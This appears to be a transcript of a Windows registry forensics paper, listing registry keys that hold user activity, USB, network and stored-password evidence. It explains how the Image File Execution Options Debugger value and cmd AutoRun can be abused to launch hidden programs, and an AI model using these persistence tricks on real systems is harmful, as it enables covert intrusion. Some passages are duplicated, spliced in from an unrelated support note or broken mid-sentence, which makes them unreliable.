WINDOWS REGISTRY Analysis Windows 9x/ME, Windows CE, Windows NT/2000/XP/2003, Windows7/8 store configuration data in registry. It is a central repository for configuration data that is stored in a hierarchical manner.System, users, applications and hardware in Windows make use of the registry to store their configuration and it is constantly accessed for reference during their operation. The registry is introduced to replace most text-based configuration files used in Windows 3.x and MS- DOS, such as .ini files, autoexec.bat and config.sys. Due to the vast amount of information stored in Windows registry, the registry can be an excellent source for potential evidential data. For instance, windows registry contains information on user accounts, typed URLs, network shared, and Run command history. Aspects discussed in this paper are based on Windows XP (Service Pack 2) Windows 7 and windows 8 registry. The registry is a database in Windows that contains important information about system hardware, installed programs and settings, and profiles of each of the user accounts on your computer. Windows continually refers to the information in the registry. We should not need to make manual changes to the registry because programs and applicatio ns typically make all the necessary changes automatically. An incorrect change to your computer's registry could render your computer inoperable. However, if a corrupt file appears in the registry, you might be required to make changes. We strongly recommend that you back up the registry before making any changes and that you only change values in the registry that you understand or have been instructed to change by a source you trust. Five root keys exist: HKLM: HKEY_LOCAL_MACHINE (Computer-specific data) HKU: HKEY_USERS (User-specific data) HKCR: HKEY_CLASSES_ROOT (application settings, file associations, class registrations for COM objects) » Link to HKLM\Software\Classes HKCC: HKEY_CURRENT_CONFIG (Current hardware conf.) » Link to HKLM\System\CurrentControlSet\Hardware Profiles\Current HKCU: HKEY_CURRENT_USER (Current user's data) » Link to HKU\<SID of current user> File locations: HKLM\SAM %SYSTEMROOT%\System32\config\SAM HKLM\Security %SYSTEMROOT%\System32\config\SECURITY HKLM\Software %SYSTEMROOT%\System32\config\software HKLM\System %SYSTEMROOT%\System32\config\system HKLM\Hardware stored in memory only – non on disk! HKU\.Default %SYSTEMROOT%\System32\config\default HKU\SID %USERPROFILE%\NTUSER.DAT HKU\SID_Classes %USERPROFILE%\Local Settings\ Application Data\Microsoft\Windows\UsrClass.dat
Transcript
WINDOWS REGISTRY Analysis
Windows 9x/ME, Windows CE, Windows NT/2000/XP/2003, Windows7/8 store
configuration data in registry. It is a central repository for configuration data that is stored in a
hierarchical manner.System, users, applications and hardware in Windows make use of the registry
to store their configuration and it is constantly accessed for reference during their operation. The
registry is introduced to replace most text-based configuration files used in Windows 3.x and MS-
DOS, such as .ini files, autoexec.bat and config.sys. Due to the vast amount of information stored
in Windows registry, the registry can be an excellent source for potential evidential data. For
instance, windows registry contains information on user accounts, typed URLs, network shared,
and Run command history. Aspects discussed in this paper are based on Windows XP (Service
Pack 2) Windows 7 and windows 8 registry.
The registry is a database in Windows that contains important information about system hardware,
installed programs and settings, and profiles of each of the user accounts on your computer.
Windows continually refers to the information in the registry.
We should not need to make manual changes to the registry because programs and applications
typically make all the necessary changes automatically. An incorrect change to your computer's
registry could render your computer inoperable. However, if a corrupt file appears in the registry,
you might be required to make changes.
We strongly recommend that you back up the registry before making any changes and that you
only change values in the registry that you understand or have been instructed to change by a
source you trust.
Five root keys exist:
HKLM: HKEY_LOCAL_MACHINE (Computer-specific data)
HKU: HKEY_USERS (User-specific data)
HKCR: HKEY_CLASSES_ROOT (application settings, file associations, class registrations for COM
HKLM\Hardware stored in memory only – non on disk!
HKU\.Default %SYSTEMROOT%\System32\config\default
HKU\SID %USERPROFILE%\NTUSER.DAT
HKU\SID_Classes %USERPROFILE%\Local Settings\
Application Data\Microsoft\Windows\UsrClass.dat
Registry files and their typical content: NTUSER.DAT Protected storage for user, MRU lists, User’s preference settings. DEFAULT System settings set during initial install of operating system. SAM Security settings and user account management. SECURITY Security settings. SOFTWARE all installed programs on the system and their settings associated
with them. SYSTEM System settings.
REGISTRY STRUCTURE
Windows Structure Logical view key(Windows 7)
FORENSIC-RELETED REGISTRY KEYS
Time Zone Information
The TZI key is a critical reference for supporting a consistent timeline of evidence. There are certain values contained within this key that can help determine time zone and daylight savings
time (DST) information, which may be necessary in converting UTC timestamps to local time. DST does not affect UTC time, but it can play a significant role in determining local time.
MRU is the abbreviation for most-recently-used. This key maintains a list of recently opened or saved files via typical Windows Explorer-style common dialog boxes (i.e. Open
dialog box and Save dialog box) (Microsoft, 2002). For instance, files (e.g. .txt, .pdf, htm, .jpg) that are recently opened or saved files from within a web browser (including IE and Firefox) are maintained. However, documents that are opened or saved via Microsoft Office programs are not
maintained. Sub key * contains the full file path to the 10 most recently opened/savedfiles. Other sub keys in OpenSaveMRU contain far more entries related to previously opened or saved files
(including the 10 most recent ones), which are grouped accordingly to file extension. A “Most Recently Used List” contains entries made due to specific actions performed by the user. There are numerous MRU list locations throughout various Registry keys. These lists are maintained in
case the user returns to them in the future. Essentially, their Function is similar to how the history and cookies act in a web browser.
XP Search Files
This key contains recent search terms using Windows default search. Sub key 5603
contains search terms for finding folders and filenames, while sub key 5604 contains search terms for finding words or phrases in a file (i.e. Windows XP) XP Search Files Software\Microsoft\Search Assistant\ACMru\5603
Internet Search Assistant Software\Microsoft\Search Assistant\ACMru\5001
Printers, Computers and People Software\Microsoft\Search Assistant\ACMru\5647
Pictures, music, and videos Software\Microsoft\Search Assistant\ACMru\5604
This key also maintains list of files recently executed or opened through Windows Explorer. This key corresponds to %USERPROFILE%\Recent (My Recent Documents). The
key contains local or network files that are recently opened and only the filename in binary form is stored. It has similar grouping as the previous OpenSaveMRU key, opened files are organized according to file extension under respective sub keys
You log on to a remote Microsoft Windows Server 2003 Service Pack 1 (SP1)-based terminal server from a client computer that is running a Japanese. Version of Microsoft Windows
XP.The terminal server uses a Microsoft Global Input Method Editor (IME) keyboard layout. The terminal server IME keyboard layout differs from the client computer when you remotely log on
to a Windows Server 2003 Service Pack 1-based terminal serve If the imjp81.ime registry entry contains a value, the client computer sends the value to the
terminal server. However, the imjp81.ime registry entry uses a default
Value of "null." The client computer incorrectly assumes that "null" is a valid file name
Warning Serious problems might occur if you modify the registry incorrectly by using Registry
Editor or by using another method. These problems might require That you reinstall the operating system. Microsoft cannot guarantee that these problems can be
solved. Modify the registry at your own risk. To work around this problem, follow these steps on each client computer: 1. Click Start, click Run, type regedit, and then click OK.
2. Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client\IME Mapping Table\JPN
3. Right-click the imjp81.ime entry, and then click Modify. 4. Clear the Value data text box, and then click OK. 5. Exit Registry Editor.
HKLM\Software\Microsoft\Terminal Server Client\IME Mapping Table\JPN (Windows 7)
Run dialog box
This key maintains a list of entries (e.g. full file path or commands like cmd, regedit,
compmgmt.msc) executed using the Start>Run commands. The MRUList value maintains a list
of alphabets which refer to the respective values. The alphabets are arranged according to the
order the entries is being added. However, most recently added entry does not imply most
recently used command as suspect may have reexecuted previous commands. Windows does not
modify the key Last Write time or MRUList if there is an existing entry in the key.
Each sub key in this key represent an installed program in the computer. All programs listed in Control Panel>Add/Remove Programs correspond to one of the listed sub keys. However,
they are other installed programs (e.g. device driver, Windows patch) that are not listed in Add/Remove Programs. Each sub key usually contains these two common registry values. Display
Name (program name) and Uninstall String (application Uninstall component’s file path, which indirectly refers to application installation path). Other possible useful registry values may exist, which include information on install date, install source and application version.
This key has a registry value named Auto run, which could contain command that is automatically executed each time cmd.exe is run. However, modification to this key requires
administrative privilege. Malware exploits this feature to load itself without user’s knowledge. Suspect could also covertly run a malicious program under the cover of cmd.exe, by setting the Auto run data to the executable file path.
HKCU\Software\Microsoft\Command Processor
WordPad - Recent Files
WordPad stores a list of recently accessed files in the Jump List and in the Registry under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Appets\Wordpad\Recent File List
Common Dialog – Last visited MRU
This key correlates to the previous OpenSaveMRU key to provide extra information. Whenever a new entry is added to the previous OpenSaveMRU key, registry value is created or
updated in this key. Each binary registry value under this key contains a recently used program executable filename, and the folder path of a file to which the program has been used to open or save it. If a file is saved, the folder path refers to the saved file destination path; if a file is opened,
the folder path refers to the file source path. New registry value will only be created to this key, if no existing registry values contain the program executable filename. However, if there is a
matching executable filename in the existing values, only the folder path section of the related registry value is updated.
This Registry key store the file name and location of Microsoft office Word document
which are used most recently.
HKCU\Software\Microsoft\Office\15.0\Word\File MRU
UserAssist
This key contains two or more subkeys, which have long hexadecimal names or globally Unique identifiers (GUIDs) and beneath each GUID is a sub key called Count. The Count
Sub key contains recorded values that pertain to objects the user has accessed on the System, such as Control Panel applets, shortcut files, programs, documents, media, etc.
This key maintains Windows virtual memory (paging file) configuration. The paging file
(usually C:\pagefile.sys) may contain evidential information that could be removed once the suspect computer is shutdown. This key contains a registry value called ClearPagefileAtShutdown which specify whether Windows should clear off the paging file when the computer shutdowns.
By default, windows will not clear the paging file. However, suspect may modify this registry value to 1 to signify paging file clearing during system shutdown (Microsoft, 2003). Forensic
investigator should check this value before shutting down a suspect computer during evidence collection process.
Existing Services This key contains list of Windows services. Each sub key represents a service and contains service’s
information such as startup configuration and executable image path. Some malware or important software such as Oracle 11g R2 will install itself as service. Thus, it leaves trace in this key
Image File Execution Option This key allows administrator to map an executable filename to a different debugger source,
allowing user to debug a program using a different program. Modification to this key requires administrative privilege. Suspect could exploit this feature to launch a completely different program under the cover of the initial program. First, suspect creates a sub key named for example, notepad.exe (taskmgr.exe, compmgmt.msc or any benign looking executable). Then under the sub key notepad.exe, suspect creates a new string (REG_SZ) value named Debugger, and directs it to an undercover program (e.g. C:\Windows\system32\telnet.exe). When the suspect executes notepad.exe, telnet client is launched instead of Notepad. If the suspect runs notepad.exe through Windows Run for instance, its history list will only shows notepad.exe. Thus, suspect could use this technique to deceive forensic examiner. Suspect could also redirect the initial program to a Trojan version of the program which launches a backdoor whenever the initial program is run. Malware exploits this feature to load itself without user's knowledge
Wireless Network A wireless Ethernet card picks up wireless access points within its range, which are Identified by
their SSID or Service Set Identifier. When an individual connects to a Network or hotspot the SSID is logged within Windows XP as a preferred network Connection. HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces
This key contains wireless network information for adapter using Windows Wireless Zero Configuration
Service. Under the GUID sub key, there are binary registry values named Static#0000, Static#0001, etc. (depending
on the number of listed SSID) which correspond to the respective list of SSID in .Preferred Networks. Box in Wireless
Network Connection configuration. The registry value contains the SSID name in binary form. If registry value Active
Settings contains an SSID name, it may signify last connected SSID. However, the result is not consistent when tested.
If suspect connect to wireless networks using other 3rd party program that is usually bundled with the network adapter,
instead of using Wireless Zero Configuration, no trace is left on this key. Forensic examiner can use this key with the
previous network adapter GUID key to determine the last assigned IP address.
In addition to logging the name of the SSID, Windows also logs the network settings of that particular connection – such as the IP address, DHCP server, domain, subnet mask, Etc.
Below this key there also may be GUID subkeys, as mentioned above. It’s also important to note that there are timestamps associated with some of the values in this key. One, for example,
is LeaseObtainedTime. This is the time in which the IP address was obtained from the DHCP server. If the computer is using vendor software to manage wireless connections then there May be additional locations where this information is stored, depending on the vendor.
Windows XP implements a network mapping tool called My Network Place, which allows
computers to easily find other computers within a LAN or Local Area Network. A computer on a properly configured LAN will record the Computer Name of all the computers on that network.
Even after the computer is no longer connected to the LAN, the list of devices that have ever connected to that system still remains, including desktop computers, laptops, and printers.
Anytime a device is connected to the Universal Serial Bus (USB), drivers are queried and
the device’s information is stored in the Registry (i.e., thumb drives, cameras, etc.). The following key contains subkeys that represent the device descriptor (Vendor ID, Product ID and Revision)
of any USB device that has been connected to the system. Beneath each of these device descriptors is the Device ID, which is also a serial number.
The serial numbers of these devices are a unique value assigned by the manufacturer, much like
the MAC address of a network interface card. Therefore, a particular USB device can be identified as to whether or not it has been connected to other Windows systems.
HKLM\System\ControlSet001\Enum\USBSTOR\
HKLM\System\ControlSet001\Enum\USB\
Mounted Devices
This key makes it possible to view each drive associated with the system. It stores a database of
mounted volumes that is used by the NTFS file system. HKLM\SYSTEM\MountedDevices
HKLM\System\MountedDevices
The first key contains a list of mounted devices, with associated persistent volume name and unique internal identifier for respective devices. This key lists any volume that is mounted and
assigned a drive letter, including USB storage devices and external DVD/CDROM drives. From the listed registry values, values name. This key find user that used the unique USB device.
This GUID will be used next to identify the user that plugged in the device. The last time the device was plugged into the machine by that user’s personal Mount point’s key in the
Discover the volume serial number of the file system partition on the USB.Here we can
knowing both the volume serial number and the volume name we can correlate the data across SHORTCUT file (LNK) analysis and the recentdocs key. The shortcut file (LNK) contains the
volume serial Number and name. RecentDocs Registry key in most cases, will contain the volume name when the “USB Device” is opened via Explorer.
Internet Explorer stores its data in one key and has three subkeys within it that holds the
Majority of useful information.
HKCU\Software\Microsoft\Internet Explorer
The first sub key, Main, stores the user’s settings in Internet Explorer. It contains
information like search bars, start page, form settings, etc. There is a form within this key that is interesting and pertains to the next section on
Windows passwords. The form is called “Form Suggest PW Ask.” If this value is “yes,” then it is
a good indicator that they have the Windows AutoComplete password feature enabled. If the user has unchecked the box to not ever remember passwords, then this value would be “no” and would
not save the user’s passwords. These passwords are saved in the SPW (SavedPassWords) key, which is discussed in the next section.
HKCU\Software\Microsoft\ Internet Explorer\Main
This next location stores all URLs that a user has typed into the address field of the web browser.
HKCU\Software\Microsoft\ Internet Explorer\TypedURLs
If the user clears the history within the Internet Options window, it will delete the TypedURLs key entirely and it will not be recreated until a URL is typed into the address field again.
As stated above, if “Form Suggest PW Ask” within the Internet Explorer\Main key
contains a “yes” value and the user tells the system to remember the password when they are prompted, then these Internet Explorer AutoComplete passwords are stored in the following key:
If “Form Suggest PW Ask” contains a “yes” value and the user selects the AutoComplete option to NOT remember the password, the password is still logged in the Registry because the
OS needs to refer to it in order to know not to ask the user to remember it again. These passwords consist of Internet Explorer protected sites, MSN Explorer, AutoComplete, and Outlook
passwords. Passwords stored in either of these keys are encrypted by the Operating System. They are stored in the following key:
HKCU\Software\Microsoft\Protected Storage System Provider
MSN Messenger or Windows Live Messenger
Windows Messenger, MSN Messenger, and Windows Live Messenger (which is the new MSN) generally utilize any of the three following keys: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
Windows application Compatibility database is used by windows to identify possible application compatibly challenged with executable. Tracks the executable file name, file size, last
modified time and in windows XP/7/8 the last update time. HKLM\System\CurrentControlSet\Control\SessionManager\AppCompatibility (Win XP)
Any executable run on the windows system could be found in this key. We can use this key to identify systems that specific malware was executed on. In addition, based on the interpretation of
the time based data you might be able to determine the last time of execution or activity on the system.
Windows XP Contain at Most 96 entries -Last Update Time is updated when the files are executed
Windows 7 Contain at most 1024 entries -Last Update Time does not exist on Win 7 Systems
It can track user windows viewing preferences to windows explorer. It can be utilized to tell if
activity occurred in a folder. In some cases you can see the files from a specific folder as well HKCR\Local settings\Software\Microsoft\Windows\Shell\BagMRU\
